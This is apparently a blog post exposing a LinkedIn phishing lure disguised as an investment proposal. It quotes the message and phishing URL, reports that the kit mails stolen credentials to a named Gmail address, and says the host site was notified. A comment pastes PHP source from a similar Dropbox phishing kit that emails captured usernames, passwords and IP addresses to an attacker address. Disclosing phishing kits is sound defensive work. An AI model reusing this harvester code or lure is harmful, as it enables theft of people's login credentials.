LinkedIn Phish – Investment Proposal

Today I received the following message from a LinkedIn contact:

Greetings,

I hope all is well with you, please review this recommendation for an investment opportunity which am considering a partnership with you if you’re interested. I hope that the reasons for this investment, which are alluded to in more details in the enclosed document( http://parkingticketing.co.uk/libraries/investment/dbnew ), will make you consider this alliance positively.

I hope you you will reply soon. With best wishes,

Warm Regards,
<redacted>

phish

I think this looked wierd, so I opened the site in a safe browser and explored a little. It turned out it was definitely a phish. The landing page looks thrustworthy:

phish2

 

The bad guys left a mistake though at http://parkingticketing.co.uk/libraries/investment/dbnew.zip . This zip file contains some simple scripts that sends all credentials submitted to the following email address: willysnows1952@gmail.com .The script then redirects you to this PDF: http://www.morganstanley.com/about/press/ip-poll-national-432013.pdf

I’ve sent an email to ParkingTicketing.co.uk to notify them about this phish.

Share
  • anonymous

    I just got a fresh one

    Same format, also left a zip file with source code behind.

    <?php

    $ip = $_SERVER['REMOTE_ADDR'];

    $time = date("m-d-Y g:i:a");

    $msg =

    "————————————————————————

    $msg .= "Dropbox Login Info by OluwaTyrulen";

    $msg .=

    "———————————————————————–

    $msg .= "Email : ".$_POST['username']."n";

    $msg .= "Password : ".$_POST['password']."n";

    $msg .=

    "———————————————————————–

    $msg .= "Sent from $ip on $timen";

    $msg .=

    "———————————————————————–

    $to = "tina.collins1941@gmail.com";

    $subject = "Dropbox Update $ip";

    $from = "From: swinzu”;

    mail($to,$subject,$msg,$from);

    header(“Location: http://www.dropbox.com“);